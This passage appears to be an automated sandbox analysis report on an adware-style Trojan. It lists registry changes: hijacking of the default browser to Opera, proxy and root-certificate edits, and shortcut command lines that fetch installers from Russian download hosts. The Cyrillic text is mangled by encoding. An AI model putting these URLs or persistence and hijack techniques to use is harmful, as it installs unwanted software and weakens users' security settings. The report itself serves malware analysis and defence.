C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_install_227031\JUR0CxdplxCY.exe (15037 bytes)

Registry activity

The process TPAutoConnSvc.exe:1776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\ThinPrint\TPPrnUI\NPI456AB0 (HP LaserJet Professional M1212nf MFP)#:1]
"TrayData" = "2,Tray 3, 3,Tray 2, 1,Tray 1, 4,Manual Feed, 7,Auto Select"
"FormData" = "1,2159,2794,LetterÃ‚Â¶40,40,2086,2712, 5,2159,3556,LegalÃ‚Â¶40,40,2086,3474, 9,2100,2970,A4Ã‚Â¶39,39,2032,2890, 7,1842,2667,ExecutiveÃ‚Â¶40,40,1761,2585, 258,2159,3302,8.5 x 13 (custom)Ã‚Â¶40,40,2086,3220, 11,1480,2100,A5Ã‚Â¶39,39,1408,2020, 70,1050,1480,A6Ã‚Â¶39,39,975,1399, 13,1820,2570,B5 (JIS)Ã‚Â¶39,39,1747,2490, 264,1950,2700,16K 195x270Ã‚Â¶39,39,1882,2620, 263,1840,2600,16K 184x260Ã‚Â¶39,39,1761,2520, 257,1970,2730,16K 197x273Ã‚Â¶39,39,1896,2650, 43,1000,1480,Japanese PostcardÃ‚Â¶39,39,921,1399, 82,1480,2000,Double Japan Postcard RotatedÃ‚Â¶39,39,1408,1919, 20,1046,2413,Envelope #10Ã‚Â¶40,40,975,2331, 37,983,1905,Envelope MonarchÃ‚Â¶40,40,907,1823, 34,1760,2500,Envelope B5Ã‚Â¶39,39,1693,2420, 28,1620,2290,Envelope C5Ã‚Â¶39,39,1544,2209, 27,1100,2200,Envelope DLÃ‚Â¶39,39,1029,2120"
"DelAfterCreate" = "1"

[HKU\.DEFAULT\Printers\DevModes2]
"NPI456AB0 (HP LaserJet Professional M1212nf MFP)#:1" = "4E 00 50 00 49 00 34 00 35 00 36 00 41 00 42 00"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\ThinPrint\TPPrnUI\NPI456AB0 (HP LaserJet Professional M1212nf MFP)#:1]

The process w0jKC6uoKzUY.exe:3152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\shortcutmaker]
"ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµCommandLine" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\w0jKC6uoKzUY.exe --partnertitle=ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ --desktop --link=http://go-search.ru/?utm_source=desktop --fileicourl=http://illespi.dom-upload.ru/gosearch3.ico --install_url=http://forces.vseturbo.ru/software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&guid=$__GUID&sig=$__SIG&ovr=$__OVR&file_id=32888998&did=1497824015&ext_partner_id=&go_search_desktop=1&ext_partner_id= --sha256=cfc495a72cab508b836bfe8efe7dfc920fc8ba3b09f5301a4f7958ec96acd7f0"
"ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµCommandLineTimeStamp" = "1424684080"

The process %original file name%.exe:3304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Mail.Ru\homesearch]
"nb_lifetime" = "1424683865"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadNetworkName" = "Network 3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "FA 1E 89 7D 4B 4F D0 01"

[HKCU\Software\Opera Software]
"nb_lifetime" = "1424683865"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecision" = "0"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.24.15, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\327c54aa\python.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\327c54aa\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\knig18679 xim2.zip,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{17FE9752-0B5A-4665-84CD-569794602F5C} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF" = "01 00 00 00 00 00 00 00 03 26 06 8A 4B 4F D0 01"

[HKCU\Software\Microsoft\Gosearch]
"nb_lifetime" = "1424683865"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecisionTime" = "FA 1E 89 7D 4B 4F D0 01"

[HKCU\Software\Microsoft\guardPlagin]
"nb_lifetime" = "1424683865"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Gosearchq]
"nb_lifetime" = "1424683865"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecisionTime" = "FA 1E 89 7D 4B 4F D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process installer.exe:3804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe]
"Path" = "%Program Files% (x86)\Opera"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer]
"GlobalAssocChangedCounter" = "35"

[HKCU\Software\Classes\http]
"EditFlags" = "2"

[HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice]
"Progid" = "OperaStable"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"URLInfoAbout" = "http://www.opera.com"

[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\launcher.exe -noautoupdate -- %1"

[HKCU\Software\Classes\OperaStable]
"URL Protocol" = "Type: REG_SZ, Length: 0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"InstallLocation" = "%Program Files% (x86)\Opera"

[HKCU\Software\Classes\.nex]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Program Files% (x86)\Opera]
"Launcher.exe" = "32"

[HKCR\https\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\launcher.exe -noautoupdate -- %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\UserChoice]
"Progid" = "OperaStable"

[HKLM\SOFTWARE\Wow6432Node\Opera Software]
"Previous Default Browser" = "%Program Files% (x86)\Opera\Opera.exe %1"

[HKCU\Software\Classes\.xht]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\RegisteredApplications]
"Opera Stable" = "Software\Clients\StartMenuInternet\OperaStable\Capabilities"

[HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice]
"Progid" = "OperaStable"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"DisplayName" = "Opera Stable 27.0.1689.69"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.crx\UserChoice]
"Progid" = "OperaStable"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities\FileAssociations]
".xhtml" = "OperaStable"
".crx" = "OperaStable"
".shtml" = "OperaStable"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCR\.html]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\InstallInfo]
"IconsVisible" = "1"

[HKCU\Software\Classes\ftp]
"URL Protocol" = "Type: REG_SZ, Length: 0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\InstallInfo]
"HideIconsCommand" = "%Program Files% (x86)\Opera\Launcher.exe --hideicons"

[HKCU\Software\Classes\http\shell\open\ddeexec\Topic]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Classes\OperaStable]
"FriendlyTypeName" = "Opera Web Document"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\DefaultIcon]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKCU\Software\Classes\https]
"URL Protocol" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCR\Applications\Opera.exe\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe %1"

[HKCR\.oex]
"(Default)" = "OperaStable.Extension"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\InstallInfo]
"ShowIconsCommand" = "%Program Files% (x86)\Opera\Launcher.exe --showicons"

[HKCU\Software\Classes\http\shell\open\ddeexec\Application]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"URLUpdateInfo" = "http://www.opera.com/download"

[HKCU\Software\Classes\OperaStable\shell\open\ddeexec\Application]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCR\.xhtml]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities]
"ApplicationIcon" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKCU\Software\Classes\OperaStable\shell\open\ddeexec]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice]
"Progid" = "OperaStable"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\InstallInfo]
"ReinstallCommand" = "%Program Files% (x86)\Opera\Launcher.exe --makedefaultbrowser"

[HKCR\OperaStable]
"URL Protocol" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\launcher.exe -noautoupdate -- %1"

[HKCR\ftp]
"URL Protocol" = "Type: REG_SZ, Length: 0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities\UrlAssociations]
"http" = "OperaStable"

[HKCR\https]
"URL Protocol" = "Type: REG_SZ, Length: 0"

[HKCR\.html\OpenWithProgids]
"OperaStable" = "Type: REG_NONE, Length: 0"

[HKCU\Software\Classes\.xhtml]
"(Default)" = "OperaStable"

[HKCR\.xhtml\OpenWithProgids]
"OperaStable" = "Type: REG_NONE, Length: 0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities\Startmenu]
"StartMenuInternet" = "OperaStable"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesChanges" = "7"

[HKCU\Software\Classes\https\shell\open\ddeexec\Topic]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesResolve" = "CC 02 00 00 4C 00 00 00 01 14 02 00 00 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"NoRepair" = "1"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice]
"Progid" = "OperaStable"

[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKCR\.crx]
"(Default)" = "OperaStable"

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCR\.oex\OpenWithProgIDs]
"OperaStable" = "Type: REG_NONE, Length: 0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"DisplayVersion" = "27.0.1689.69"

[HKCR\.xht\OpenWithProgids]
"OperaStable" = "Type: REG_NONE, Length: 0"

[HKCU\Software\Classes\.html]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"DisplayIcon" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities\FileAssociations]
".htm" = "OperaStable"

[HKCU\Software\Classes\ftp\shell\open\ddeexec\Topic]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCR\OperaStable\DefaultIcon]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"NoModify" = "1"

[HKCU\Software\Classes\ftp]
"EditFlags" = "2"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities]
"ApplicationName" = "Opera Stable"

[HKCR\.shtml]
"(Default)" = "OperaStable"

[HKCU\Software\Classes\.shtml]
"(Default)" = "OperaStable"

[HKCR\OperaStable]
"FriendlyTypeName" = "Opera Web Document"

[HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice]
"Progid" = "OperaStable"

[HKCU\Software\Classes\http]
"URL Protocol" = "Type: REG_SZ, Length: 0"

[HKCR\https]
"EditFlags" = "2"

[HKCR\.htm\OpenWithProgids]
"OperaStable" = "Type: REG_NONE, Length: 0"

[HKCU\Software\Classes\.htm]
"(Default)" = "OperaStable"

[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\launcher.exe -noautoupdate -- %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities\FileAssociations]
".nex" = "OperaStable"

[HKCU\Software\Classes\OperaStable\shell\open\ddeexec\Topic]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCR\.htm]
"(Default)" = "OperaStable"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities\UrlAssociations]
"https" = "OperaStable"

[HKCR\HTTP]
"EditFlags" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"Favorites" = "00 7C 01 00 00 14 00 1F 80 C8 27 34 1F 10 5C 10"

[HKCU\Software\Classes\OperaStable\DefaultIcon]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities\UrlAssociations]
"ftp" = "OperaStable"

[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "OperaStable"

[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKCR\.shtml\OpenWithProgids]
"OperaStable" = "Type: REG_NONE, Length: 0"

[HKCR\.nex]
"(Default)" = "OperaStable"

[HKCU\Software\Opera Software]
"Previous Default Browser" = "%Program Files%\Internet Explorer\iexplore.exe %1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"UninstallString" = "%Program Files% (x86)\Opera\Launcher.exe /uninstall"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesVersion" = "2"

[HKCU\Software\Classes\.crx]
"(Default)" = "OperaStable"

[HKCR\OperaStable\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe -noautoupdate -- %1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"HelpLink" = "http://www.opera.com/support"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities\FileAssociations]
".html" = "OperaStable"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable]
"(Default)" = "Opera Stable"

[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nex\UserChoice]
"Progid" = "OperaStable"

[HKCU\Software\Opera Software]
"Last Stable Install Path" = "%Program Files% (x86)\Opera\"

[HKCU\Software\Classes\https\shell\open\ddeexec\Application]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities\FileAssociations]
".xht" = "OperaStable"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht\UserChoice]
"Progid" = "OperaStable"

[HKCU\Software\Classes\https]
"EditFlags" = "2"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Opera 27.0.1689.69]
"Publisher" = "Opera Software ASA"

[HKCR\.xht]
"(Default)" = "OperaStable"

[HKCU\Software\Classes\ftp\shell\open\ddeexec\Application]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCR\ftp]
"EditFlags" = "2"

[HKCU\Software\Classes\OperaStable\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\Launcher.exe -noautoupdate -- %1"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "OperaStable"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\launcher.exe -noautoupdate -- %1"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files% (x86)\Opera\launcher.exe -noautoupdate -- %1"

[HKCR\HTTP]
"URL Protocol" = "Type: REG_SZ, Length: 0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\Capabilities]
"ApplicationDescription" = "The Best Internet Experience on any device"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\UserChoice]
"Progid" = "OperaStable"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.crx\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nex\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\UserChoice]
"Progid"

The process Df6Dtkv9LPdV.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Opera Software]
"Last Stable Install Path" = "%Program Files% (x86)\Opera\"

The process Df6Dtkv9LPdV.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "FA 1E 89 7D 4B 4F D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadNetworkName" = "Network 3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\29\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecisionTime" = "EA 4C D4 88 4B 4F D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecisionTime" = "EA 4C D4 88 4B 4F D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process opera.exe:3144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\29\52C64B7E]
"LanguageList" = "en-US, en"

The process opera.exe:3108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process opera.exe:3464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\29\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 79 E4 A9 84"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436"

The process M4qMs9te1cPN.exe:4064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\29\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesChanges" = "9"

[HKCU\Software\shortcutmaker]
"ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµCommandLineTimeStamp" = "1424684193"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesVersion" = "2"
"Favorites" = "00 7C 01 00 00 14 00 1F 80 C8 27 34 1F 10 5C 10"
"FavoritesResolve" = "CC 02 00 00 4C 00 00 00 01 14 02 00 00 00 00 00"

[HKCU\Software\shortcutmaker]
"ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµCommandLine" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\M4qMs9te1cPN.exe --partnertitle=ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ --quicklaunch --link=http://go-search.ru/?utm_source=quicklaunch --fileicourl=http://illespi.dom-upload.ru/gosearch3.ico --install_url=http://forces.vseturbo.ru/software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&guid=$__GUID&sig=$__SIG&ovr=$__OVR&file_id=32888998&did=1497824015&ext_partner_id=&go_search_taskbar=1&ext_partner_id= --sha256=4a9f01d7681a4259c0fb8354fdb417f774e6d4d8d38b449b2f8556fab71a0aad"

The process BackgroundSingleton.exe:3692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "0D 5A 2E 1D 4C 4F D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f3-c8-bd]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9C99CCBB-10A0-4B2A-A5BE-4CAC43F74632}]
"WpadNetworkName" = "Network 3"

